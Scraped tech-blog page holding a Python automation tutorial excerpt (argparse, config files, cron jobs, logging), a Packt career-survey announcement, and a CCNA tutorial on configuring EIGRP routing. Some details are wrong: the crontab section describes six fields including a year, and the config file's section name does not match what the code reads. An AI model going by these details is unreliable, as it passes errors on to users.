int(config['DEFAULT']['n1']) args.n2 = int(config['DEFAULT']['n2']) main(args.n1, args.n2) Create the config file config.ini: [ARGUMENTS] n1=5 n2=7 Run the command with the config file: $ python3 prepare_task_step2.py -c config.ini The result is 35 $ python3 prepare_task_step2.py -c config.ini -n1 2 -n2 3 The result is 35 Add a parameter to store the result in a file, and save it as prepare_task_step5.py: import argparse import sys import configparser def main(number, other_number, output): result = number * other_number print(f'The result is {result}', file=output) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-n1', type=int, help='A number', default=1) parser.add_argument('-n2', type=int, help='Another number', default=1) parser.add_argument('--config', '-c', type=argparse.FileType('r'), help='config file') parser.add_argument('-o', dest='output', type=argparse.FileType('w'), help='output file', default=sys.stdout) args = parser.parse_args() if args.config: config = configparser.ConfigParser() config.read_file(args.config) # Transforming values into integers args.n1 = int(config['DEFAULT']['n1']) args.n2 = int(config['DEFAULT']['n2']) main(args.n1, args.n2, args.output) Run the result to check that it's sending the output to the defined file: $ python3 prepare_task_step5.py -n1 3 -n2 5 -o result.txt $ cat result.txt The result is 15 $ python3 prepare_task_step5.py -c config.ini -o result2.txt $ cat result2.txt The result is 35 How it works... Note that the argparse module allows us to define files as parameters, with the argparse.FileType type, and opens them automatically. This is very handy and will raise an error if the file is not valid. The configparser module allows us to use config files with ease. As demonstrated in Step 2, the parsing of the file is as simple as follows: config = configparser.ConfigParser() config.read_file(file) The config will then be accessible as a dictionary divided by sections, and then values. Note that the values are always stored in string format, requiring to be transformed into other types, such as integers. Python 3 allows us to pass a file parameter to the print function, which will write to that file. Step 5 shows the usage to redirect all the printed information to a file. Note that the default parameter is sys.stdout, which will print the value to the Terminal (standard output). This makes it so that calling the script without an -o parameter will display the information on the screen, which is helpful in debugging: $ python3 prepare_task_step5.py -c config.ini The result is 35 $ python3 prepare_task_step5.py -c config.ini -o result.txt $ cat result.txt The result is 35 Setting up a cron job Cron is an old-fashioned but reliable way of executing commands. It has been around since the 70s in Unix, and it's an old favorite in system administration to perform maintenance, such as freeing space, rotating logs, making backups, and other common operations. Getting ready We will produce a script, called  cron.py: import argparse import sys from datetime import datetime import configparser def main(number, other_number, output): result = number * other_number print(f'[{datetime.utcnow().isoformat()}] The result is {result}', file=output) if __name__ == '__main__': parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument('--config', '-c', type=argparse.FileType('r'), help='config file', default='/etc/automate.ini') parser.add_argument('-o', dest='output', type=argparse.FileType('a'), help='output file', default=sys.stdout) args = parser.parse_args() if args.config: config = configparser.ConfigParser() config.read_file(args.config) # Transforming values into integers args.n1 = int(config['DEFAULT']['n1']) args.n2 = int(config['DEFAULT']['n2']) main(args.n1, args.n2, args.output) Note the following details: The config file is by default, /etc/automate.ini. Reuse config.ini from the previous recipe. A timestamp has been added to the output. This will make it explicit when the task is run. The result is being added to the file, as shown with the 'a' mode where the file is open. The ArgumentDefaultsHelpFormatter parameter automatically adds information about default values when printing the help using the -h argument. Check that the task is producing the expected result and that you can log to a known file: $ python3 cron.py [2018-05-15 22:22:31.436912] The result is 35 $ python3 cron.py -o /path/automate.log $ cat /path/automate.log [2018-05-15 22:28:08.833272] The result is 35 How to do it... Obtain the full path of the Python interpreter. This is the interpreter that's on your virtual environment: $ which python /your/path/.venv/bin/python Prepare the cron to be executed. Get the full path and check that it can be executed with no problem. Execute it a couple of times: $ /your/path/.venv/bin/python /your/path/cron.py -o /path/automate.log $ /your/path/.venv/bin/python /your/path/cron.py -o /path/automate.log Check that the result is being added correctly to the result file: $ cat /path/automate.log [2018-05-15 22:28:08.833272] The result is 35 [2018-05-15 22:28:10.510743] The result is 35 Edit the crontab file to run the task once every five minutes: $ crontab -e */5 * * * * /your/path/.venv/bin/python /your/path/cron.py -o /path/automate.log Note that this opens an editing Terminal with your default command-line editor. Check the crontab contents. Note that this displays the crontab contents, but doesn't set it to edit: $ contab -l */5 * * * * /your/path/.venv/bin/python /your/path/cron.py -o /path/automate.log Wait and check the result file to see how the task is being executed: $ tail -F /path/automate.log [2018-05-17 21:20:00.611540] The result is 35 [2018-05-17 21:25:01.174835] The result is 35 [2018-05-17 21:30:00.886452] The result is 35 How it works... The crontab line consists of a line describing how often to run the task (first six elements), plus the task. Each of the initial six elements mean a different unit of time to execute. Most of them are stars, meaning any: * * * * * * | | | | | | | | | | | +-- Year (range: 1900-3000) | | | | +---- Day of the Week (range: 1-7, 1 standing for Monday) | | | +------ Month of the Year (range: 1-12) | | +-------- Day of the Month (range: 1-31) | +---------- Hour (range: 0-23) +------------ Minute (range: 0-59) Therefore, our line, */5 * * * * *, means every time the minute is divisible by 5, in all hours, all days... all years. Here are some examples: 30 15 * * * * means "every day at 15:30" 30 * * * * * means "every hour, at 30 minutes" 0,30 * * * * * means "every hour, at 0 minutes and 30 minutes" */30 * * * * * means "every half hour" 0 0 * * 1 * means "every Monday at 00:00" Do not try to guess too much. Use a cheat sheet like crontab guru for examples and tweaks. Most of the common usages will be described there directly. You can also edit a formula and get a descriptive text on how it's going to run. After the description of how to run the cron job, including the line to execute the task, as prepared in Step 2 in the How to do it… section. Capturing errors and problems An automated task's main characteristic is its fire-and-forget quality. We are not actively looking at the result, but making it run in the background. This recipe will present an automated task that will safely store unexpected behaviors in a log file that can be checked afterward. Getting ready As a starting point, we'll use a task that will divide two numbers, as described in the command line. How to do it... Create the task_with_error_handling_step1.py file, as follows: import argparse import sys def main(number, other_number, output): result = number / other_number print(f'The result is {result}', file=output) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-n1', type=int, help='A number', default=1) parser.add_argument('-n2', type=int, help='Another number', default=1) parser.add_argument('-o', dest='output', type=argparse.FileType('w'), help='output file', default=sys.stdout) args = parser.parse_args() main(args.n1, args.n2, args.output) Execute it a couple of times to see that it divides two numbers: $ python3 task_with_error_handling_step1.py -n1 3 -n2 2 The result is 1.5 $ python3 task_with_error_handling_step1.py -n1 25 -n2 5 The result is 5.0 Check that dividing by 0 produces an error and that the error is not logged on the result file: $ python task_with_error_handling_step1.py -n1 5 -n2 1 -o result.txt $ cat result.txt The result is 5.0 $ python task_with_error_handling_step1.py -n1 5 -n2 0 -o result.txt Traceback (most recent call last): File "task_with_error_handling_step1.py", line 20, in <module> main(args.n1, args.n2, args.output) File "task_with_error_handling_step1.py", line 6, in main result = number / other_number ZeroDivisionError: division by zero $ cat result.txt Create the task_with_error_handling_step4.py file: import logging import sys import logging LOG_FORMAT = '%(asctime)s %(name)s %(levelname)s %(message)s' LOG_LEVEL = logging.DEBUG def main(number, other_number, output): logging.info(f'Dividing {number} between {other_number}') result = number / other_number print(f'The result is {result}', file=output) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-n1', type=int, help='A number', default=1) parser.add_argument('-n2', type=int, help='Another number', default=1) parser.add_argument('-o', dest='output', type=argparse.FileType('w'), help='output file', default=sys.stdout) parser.add_argument('-l', dest='log', type=str, help='log file', default=None) args = parser.parse_args() if args.log: logging.basicConfig(format=LOG_FORMAT, filename=args.log, level=LOG_LEVEL) else: logging.basicConfig(format=LOG_FORMAT, level=LOG_LEVEL) try: main(args.n1, args.n2, args.output) except Exception as exc: logging.exception("Error running task") exit(1) Run it to check that it displays the proper INFO and ERROR log and that it stores it on the log file: $ python3 task_with_error_handling_step4.py -n1 5 -n2 0 2018-05-19 14:25:28,849 root INFO Dividing 5 between 0 2018-05-19 14:25:28,849 root ERROR division by zero Traceback (most recent call last): File "task_with_error_handling_step4.py", line 31, in <module> main(args.n1, args.n2, args.output) File "task_with_error_handling_step4.py", line 10, in main result = number / other_number ZeroDivisionError: division by zero $ python3 task_with_error_handling_step4.py -n1 5 -n2 0 -l error.log $ python3 task_with_error_handling_step4.py -n1 5 -n2 0 -l error.log $ cat error.log 2018-05-19 14:26:15,376 root INFO Dividing 5 between 0 2018-05-19 14:26:15,376 root ERROR division by zero Traceback (most recent call last): File "task_with_error_handling_step4.py", line 33, in <module> main(args.n1, args.n2, args.output) File "task_with_error_handling_step4.py", line 11, in main result = number / other_number ZeroDivisionError: division by zero 2018-05-19 14:26:19,960 root INFO Dividing 5 between 0 2018-05-19 14:26:19,961 root ERROR division by zero Traceback (most recent call last): File "task_with_error_handling_step4.py", line 33, in <module> main(args.n1, args.n2, args.output) File "task_with_error_handling_step4.py", line 11, in main result = number / other_number ZeroDivisionError: division by zero How it works... To properly capture any unexpected exceptions, the main function should be wrapped into a try-except block, as done in Step 4 in the How to do it… section. Compare this to how Step 1 is not wrapping the code: try: main(...) except Exception as exc: # Something went wrong logging.exception("Error running task") exit(1) The extra step to exit with status 1 with the exit(1) call informs the operating system that something went wrong with our script. The logging module allows us to log. Note the basic configuration, which includes an optional file to store the logs, the format, and the level of the logs to display. Creating logs is easy. You can do this by making a call to the method logging.<logging level>, (where logging level is debug, info, and so on). logging.exception() is a special case that will create an ERROR log, but it will also include information about the exception, such as the stack trace. Remember to check logs to discover errors. A useful reminder is to add a note on the results file, like this: try: main(args.n1, args.n2, args.output) except Exception as exc: logging.exception(exc) print('There has been an error. Check the logs', file=args.output) In this article, we saw how to define and design a task so that no human intervention is needed to run it. We learned how to use cron for automating a task. We further presented an automated task that will safely store unexpected behaviors in a log file that can be checked afterward. If you found this post useful, do check out the book, Python Automation Cookbook to develop a clear understanding of how to automate your business processes using Python. This includes detecting opportunities by scraping the web, analyzing information to generate automatic spreadsheets reports with graphs, and communicating with automatically generated emails. Write your first Gradle build script to start automating your project [Tutorial] Ansible 2 for automating networking tasks on Google Cloud Platform [Tutorial] Automating OpenStack Networking and Security with Ansible 2 [Tutorial]
Read more
  • 0
  • 0
  • 16505
article-image-pay-it-forward-this-new-year-rewriting-the-code-on-career-development
Packt Editorial Staff
09 Jan 2019
3 min read
Save for later

Pay it Forward this New Year – Rewriting the code on career development

Packt Editorial Staff
09 Jan 2019
3 min read
This Festive and New Year period, Packt Publishing Ltd are commissioning their newest group of authors – you, the everyday expert – in order to help the next generation of developers, coders, and architects. Packt, a global leader in publishing technology and coding eBooks and videos,  are asking the technology community to ‘pay it forward’ by looking back at their career and paying their advice forward to support the next generation of technology leaders via a survey.  The aim is to rewrite the code on career development and find out what everyday life looks like for those in our community. The Pay it Forward eBook that will be created, will provide tips and insights from the tech profession. Rather than giving off the shelf advice on how to better your career, Packt are asking everyday experts – the professionals across the globe who make the industry tick – for the insights and advice they would give from the good and the bad that they have seen. The most insightful and useful responses to the survey will be published by Packt in a new eBook, which will be available for free in early 2019. Some of the questions Pay it Forward will seek answers to, include: What is the biggest myth about working in tech? If you could give one career hack, what would it be? How do you keep on top of new developments and news? What are the common challenges you have seen or experienced in your profession? Who do you most admire and why? What is the best piece of advice you have received that has helped you in your career? What advice would you give to a student wishing to enter your profession? Have you actually broken the internet? We all make mistakes, how do you handle them? What do you love about what you do? People can offer their responses here: http://payitforward.packtpub.com/ Commenting on Pay it Forward, Packt Publishing Ltd CEO and founder Dave Maclean, said, “Over time we all gain knowledge through our experiences. We’ve all failed and learned and found better ways to do things.  As we come into the New Year, we’re reflecting on what we have learned and we’re calling on our community of everyday experts to share their knowledge with people who are new to the industry, to the next generation of changemakers.” “For our part, Packt will produce a book that pulls together this advice and make it available for free to help those wishing to pursue a career within technology.” The survey should take no more than 10 minutes to complete and is in complete confidence, with no disclosure of names or details, unless agreed.
Read more
  • 0
  • 0
  • 2820

article-image-implementing-the-eigrp-routing-protocol-tutorial
Amrata Joshi
09 Jan 2019
13 min read
Save for later

Implementing the EIGRP Routing Protocol [Tutorial]

Amrata Joshi
09 Jan 2019
13 min read
EIGRP originated from Interior Gateway Routing Protocol (IGRP). The problem with IGRP is that it had no support for Variable Length Subnet Masking (VLSM) and it was broadcast-based. With the Enhance Interior Gateway Routing Protocol, we now have support for VLSM and the updates are sent via a multicast using the following multicast address: 224.0.0.100 for IPv4. This article is an excerpt taken from the book  CCNA Routing and Switching 200-125 Certification Guide by Lazaro (Laz) Diaz. This book covers the understanding of networking using routers and switches, layer 2 technology and its various configurations and connections, VLANS and inter-VLAN routing and more. You can learn how to configure default, static, and dynamic routing, how to design and implement subnetted IPv4 and IPv6 addressing schemes and more. This article focuses on how EIGRP works, its features, and configuring EIGRP for single autonomous systems and multiple autonomous systems. EIGRP has a lot more to offer than its predecessor. Not only is it a classless routing protocol with VLSM capabilities, it has a maximum hop count of 255, but by default this is set to 100. It is also considered a hybrid or advanced distance-vector routing protocol. That means that it has the better of two worlds, with a links state and distance vector (DV). The DV features are just like RIPv2, where it has limited hop counts. It will send out the complete routing table to its neighboring routers the first time it tries to converge, and it will summarize the route. So, you would have to use the no auto-summary command so that it sends out the subnet mask along with the updates. It has link state features, such as triggered updates, after it has fully converged, and the routing table is complete. EIGRP will maintain neighbor relationships or adjacencies, using hello messages and when a network is added or removed, it will only send that change. EIGRP also has a very intelligent algorithm. The Dual algorithm will consider several attributes to make a more efficient or reliable decision as to which path it will send out the packet on to reach the destination faster. Also, EIGRP is based on autonomous systems, with a range from 1-65,535. You can only have one autonomous system, which means all the routers are sharing the same routing table, or you can have multiple autonomous systems, at that point you would have to redistribute the routes into the other AS, for the routers to communicate with each other. So, EIGRP is a very powerful routing protocol and it has a lot of benefits to allow us to run our network more efficiently. So, let's create a list of the major features: Support for VLSM or CIDR Summarization and discontinuous networks Best path selection using the DUAL No broadcast; we use multicast now Supports IPv4 and IPv6 Efficient neighbor discovery Diffusing Update Algorithm or DUAL This is the algorithm that allows EIGRP to have all the features it has and allows traffic to be so reliable. The following is a list of the essential tasks that it does: Finds a backup route if the topology permits Support for VLSM Dynamic route recovery Query its neighbor routers for other alternate routes EIGRP routers maintain a copy of all their neighbors' routes, so they can calculate their own cost to each destination network. That way, if the successor route goes down, they can query the topology table for alternate or backup routes. This is what makes EIGRP so awesome since it keeps all the routes from their neighbors and, if a route goes down, it can query the topology table for an alternate route. But, what if the query to the topology table does not work? Well, EIGRP will then ask its neighbors for help to find an alternate path! The DUAL strategy and the reliability and leveraging of other routers make it the quickest to converge on a network. For the DUAL to work, it must meet the following three requirements: Neighbors are discovered or noted as dead within a distinct time Messages that transmitted should be received correctly Messages and changes received must be dealt with in the order they were received The following command will show you those hello messages received, and more: R1#sh ip eigrp traffic IP-EIGRP Traffic Statistics for process 100 Hellos sent/received: 56845/37880 Updates sent/received: 9/14 Queries sent/received: 0/0 Replies sent/received: 0/0 Acks sent/received: 14/9 Input queue high water mark 1, 0 drops SIA-Queries sent/received: 0/0 SIA-Replies sent/received: 0/0 If you wanted to change the default hello timer to something greater, the command would be the following: Remember that this command is typed under interface configuration mode. Configuring EIGRP EIGRP also works with tables. The routing table, topology table, and neighbor table, all work together to make sure if a path to a destination network fails then the routing protocol will always have an alternate path to that network. The alternate path is chosen by the FD or feasible distance. If you have the lowest FD, then you are the successor route and will be placed in the routing table. If you have a higher FD, you will remain in the topology table as a feasible successor. So, EIGRP is a very reliable protocol. Let's configure it. The following topology is going to be a full mesh, with LANs on each router. This will add to the complexity of the lab, so we can look at everything we have talked about. Before we begin configurations, we must know the IP addressing scheme of each device. The following table shows the addresses, gateways, and masks of each device: The routing protocol in use must learn to use our show commands: R1#sh ip protocols Routing Protocol is "eigrp 100 " Outgoing update filter list for all interfaces is not set Incoming update filter list for all interfaces is not set Default networks flagged in outgoing updates Default networks accepted from incoming updates EIGRP metric weight K1=1, K2=0, K3=1, K4=0, K5=0 EIGRP maximum hopcount 100 EIGRP maximum metric variance 1 Redistributing: eigrp 100 Automatic network summarization is not in effect Maximum path: 4 Routing for Networks: 192.168.1.0 10.0.0.0 Routing Information Sources: Gateway Distance Last Update 10.1.1.10 90 1739292 10.1.1.22 90 1755881 10.1.1.6 90 1774985 Distance: internal 90 external 170 Okay, you have the topology, the IP scheme, and which routing protocol to use, and its autonomous system. As you can see, I already configured the lab, but now it's your turn. You are going to have to configure it to follow along with the show command we are about to do. You should, by now, know your admin commands. The first thing you need to worry about is connectivity, so I will show you the output of the sh ip int brief command from each router: As you can see, all my interfaces have the correct IPv4 addresses and they are all up; your configuration should be the same. If you also want to see the subnet mask of the command you could have done, which is like sh ip int brief, it is sh protocols: After you have checked that all your interfaces are up and running, it is now time to configure the routing protocol. We will be doing a single autonomous system using the number 100 on all the routers, so they can share the same routing table. Through the uses of hello messages, they can discover their neighbors. The configuration of the EIGRP protocol should look like this per router: As you can see, we are using the 100 autonomous system number for all routers and when we advertise the networks, especially the 10.1.1.0 network, we use the classfull boundary, which is a Class A network. We must not forget the no auto-summary command or it will not send out the subnet mask on the updates. Now, let's check out our routing tables to see if we have converged fully, meaning we have found all our networks: R2 R2#SH IP ROUTE Gateway of last resort is not set 10.0.0.0/30 is subnetted, 6 subnets D 10.1.1.4 [90/2172416] via 10.1.1.26, 02:27:38, FastEthernet0/1 C 10.1.1.8 is directly connected, Serial0/0/0 D 10.1.1.12 [90/2172416] via 10.1.1.26, 02:27:38, FastEthernet0/1 C 10.1.1.16 is directly connected, Serial0/0/1 D 10.1.1.20 [90/2172416] via 10.1.1.9, 02:27:39, Serial0/0/0 [90/2172416] via 10.1.1.18, 02:27:39, Serial0/0/1 C 10.1.1.24 is directly connected, FastEthernet0/1 D 192.168.1.0/24 [90/2172416] via 10.1.1.9, 02:27:39, Serial0/0/0 C 192.168.2.0/24 is directly connected, FastEthernet0/0 D 192.168.3.0/24 [90/2172416] via 10.1.1.18, 02:27:39, Serial0/0/1 D 192.168.4.0/24 [90/30720] via 10.1.1.26, 02:27:38, FastEthernet0/1 R3 R3Gateway of last resort is not set 10.0.0.0/30 is subnetted, 6 subnets D 10.1.1.4 [90/2172416] via 10.1.1.21, 02:28:49, FastEthernet0/1 D 10.1.1.8 [90/2172416] via 10.1.1.21, 02:28:49, FastEthernet0/1 C 10.1.1.12 is directly connected, Serial0/0/1 C 10.1.1.16 is directly connected, Serial0/0/0 C 10.1.1.20 is directly connected, FastEthernet0/1 D 10.1.1.24 [90/2172416] via 10.1.1.17, 02:28:50, Serial0/0/0 [90/2172416] via 10.1.1.14, 02:28:50, Serial0/0/1 D 192.168.1.0/24 [90/30720] via 10.1.1.21, 02:28:49, FastEthernet0/1 D 192.168.2.0/24 [90/2172416] via 10.1.1.17, 02:28:50, Serial0/0/0 C 192.168.3.0/24 is directly connected, FastEthernet0/0 D 192.168.4.0/24 [90/2172416] via 10.1.1.14, 02:28:50, Serial0/0/1 R4 R4#SH IP ROUTE Gateway of last resort is not set 10.0.0.0/30 is subnetted, 6 subnets C 10.1.1.4 is directly connected, Serial0/0/1 D 10.1.1.8 [90/2172416] via 10.1.1.25, 02:29:51, FastEthernet0/1 C 10.1.1.12 is directly connected, Serial0/0/0 D 10.1.1.16 [90/2172416] via 10.1.1.25, 02:29:51, FastEthernet0/1 D 10.1.1.20 [90/2172416] via 10.1.1.5, 02:29:52, Serial0/0/1 [90/2172416] via 10.1.1.13, 02:29:52, Serial0/0/0 C 10.1.1.24 is directly connected, FastEthernet0/1 D 192.168.1.0/24 [90/2172416] via 10.1.1.5, 02:29:52, Serial0/0/1 D 192.168.2.0/24 [90/30720] via 10.1.1.25, 02:29:51, FastEthernet0/1 D 192.168.3.0/24 [90/2172416] via 10.1.1.13, 02:29:52, Serial0/0/0 C 192.168.4.0/24 is directly connected, FastEthernet0/0 It seems that EIGRP has found all our different networks and has applied the best metric to each destination. If you look closely at the routing table, you will see that two networks have multiple paths to it: 10.1.1.20 and 10.1.1.24. The path that it takes is determined by the router that is learning it. So, what does that mean? EIGRP has two successor routes or two feasible distances that are equal, so they must go to the routing table. All other routes to include the successor routes will be in the topology table. I have highlighted the networks that have the multiple paths, which means they can go in either direction, but EIGRP will load balance by default when it has multiple paths: We need to see exactly which path it is taking to this network: 10.1.1.20. This is from the R4 viewpoint. It could go via 10.1.1.5 or 10.1.1.13, so let's use the tools we have at hand, such as traceroute: R4#traceroute 10.1.1.20 Type escape sequence to abort. Tracing the route to 10.1.1.20 1 10.1.1.5 7msec 1 msec 6 msec So, even if they have the identical metric of 2172416, it will choose the first path from top to bottom, to send the packet to the destination. If that path is shut down or is disconnected, it will still have an alternate route to get to the destination. In your lab, if you followed the configuration exactly as I did it, you should get the same results. But, this is where your curiosity should come in. Shut down the 10.1.1.5 interface and see what happens. What will your routing table look like then? Will it have only one route to the destination or will it have more than one? Remember that when a successor route goes down, EIGRP will query the topology table to find an alternate route, but in this situation, will it do that, since an alternate route exists? Let's take a look: R1(config)#int s0/0/0 R1(config-if)#shut Now let's take a look at the routing table from the R4 perspective. The first thing that happens is the following: R4# %LINK-5-CHANGED: Interface Serial0/0/1, changed state to down %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial0/0/1, changed state to down %DUAL-5-NBRCHANGE: IP-EIGRP 100: Neighbor 10.1.1.5 (Serial0/0/1) is down: interface down R4#sh ip route Gateway of last resort is not set 10.0.0.0/30 is subnetted, 5 subnets D 10.1.1.8 [90/2172416] via 10.1.1.25, 02:57:14, FastEthernet0/1 C 10.1.1.12 is directly connected, Serial0/0/0 D 10.1.1.16 [90/2172416] via 10.1.1.25, 02:57:14, FastEthernet0/1 D 10.1.1.20 [90/2172416] via 10.1.1.13, 02:57:15, Serial0/0/0 C 10.1.1.24 is directly connected, FastEthernet0/1 D 192.168.1.0/24 [90/2174976] via 10.1.1.13, 02:57:14, Serial0/0/0 D 192.168.2.0/24 [90/30720] via 10.1.1.25, 02:57:14, FastEthernet0/1 D 192.168.3.0/24 [90/2172416] via 10.1.1.13, 02:57:15, Serial0/0/0 C 192.168.4.0/24 is directly connected, FastEthernet0/0 Only one route exists, which is 10.1.1.13. It had the same metric as 10.1.1.5. So, in this situation, there was no need to query the topology table, since an existing alternate route already existed in the routing table. But, let's verify this with the traceroute command: R4#traceroute 10.1.1.20 Type escape sequence to abort. Tracing the route to 10.1.1.20 1 10.1.1.13 0 msec 5 msec 1 msec (alternate path) 1 10.1.1.5 7msec 1 msec 6 msec (original path) Since it only had one path to get to the 10.1.1.20 network, it was quicker in getting there, but when it had multiple paths, it took longer. Now I know we are talking about milliseconds, but still, it is a delay, none the less. So, what does this tell us? Redundancy is not always a good thing. This is a full-mesh topology, which is very costly and we are running into delays. So, be careful in your design of the network. There is such a thing as too much redundancy and you can easily create Layer 3 loops and delays. We looked at the routing table, but not the topology table, so I am going to turn on the s0/0/0 interface again and look at the routing table once more to make sure all is as it was and then look at the topology table. Almost immediately after turning on the s0/0/0 interface on R1, I receive the following message: R4# %LINK-5-CHANGED: Interface Serial0/0/1, changed state to up %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial0/0/1, changed state to up %DUAL-5-NBRCHANGE: IP-EIGRP 100: Neighbor 10.1.1.5 (Serial0/0/1) is up: new adjacency Let us peek at the routing table on R4: R4#sh ip route Gateway of last resort is not set 10.0.0.0/30 is subnetted, 6 subnets C 10.1.1.4 is directly connected, Serial0/0/1 D 10.1.1.8 [90/2172416] via 10.1.1.25, 03:08:05, FastEthernet0/1 C 10.1.1.12 is directly connected, Serial0/0/0 D 10.1.1.16 [90/2172416] via 10.1.1.25, 03:08:05, FastEthernet0/1 D 10.1.1.20 [90/2172416] via 10.1.1.13, 03:08:05, Serial0/0/0 [90/2172416] via 10.1.1.5, 00:01:45, Serial0/0/1 C 10.1.1.24 is directly connected, FastEthernet0/1 D 192.168.1.0/24 [90/2172416] via 10.1.1.5, 00:01:45, Serial0/0/1 D 192.168.2.0/24 [90/30720] via 10.1.1.25, 03:08:05, FastEthernet0/1 D 192.168.3.0/24 [90/2172416] via 10.1.1.13, 03:08:05, Serial0/0/0 C 192.168.4.0/24 is directly connected, FastEthernet0/0 Notice that the first path in the network is through 10.1.1.13 and not 10.1.1.5, as before. Now let us look at the topology table: Keep in mind that the topology has all possible routes to all destination networks. Only the ones with the lowest FD make it to the routing table and earn the title of the successor route. If you notice the highlighted networks, they are the same as the ones on the routing table. They both have the exact same metric, so they would both earn the title of successor route. But let's analyze another network. Let's choose that last one on the list, 192.168.3.0. It has multiple routes, but the metrics are not the same. If you notice, the FD is 2172416, so 10.1.1.13 would be the successor route, but 10.1.1.5 has a metric of 2174976, which truly makes it a feasible successor and will remain in the topology table. So, what does that mean to us? Well, if the successor route was to go down, then it would have to query the topology table in order to acquire an alternate path. What does the routing table show us about the 192.168.3.0 network, from the R3 perspective? R4#sh ip route D 192.168.3.0/24 [90/2172416] via 10.1.1.13, 03:28:10, Serial0/0/0 There is only one route, the one with the lowest FD, so it's true that, in this case, if this route goes down, a query to the topology table must take place. So, you see it all depends on how you set up your network topology; you may have a feasible successor, or you may not. So, you must analyze the network you are working with to make it an effective network. We have not even changed the bandwidth of any of the interfaces or used the variance command in order to include other routes in our load balancing. Thus, in this article, we covered, how EIGRP works, its features, and configuring EIGRP for single autonomous systems and multiple autonomous systems. To know more about designing and implementing subnetted IPv4 and IPv6 addressing schemes, and more, check out the book  CCNA Routing and Switching 200-125 Certification Guide. Using IPv6 on Packet Tracer IPv6 support to be automatically rolled out for most Netify Application Delivery Network users IPv6, Unix Domain Sockets, and Network Interfaces
Read more
  • 0
  • 0
  • 10713
Modal Close icon
Modal Close icon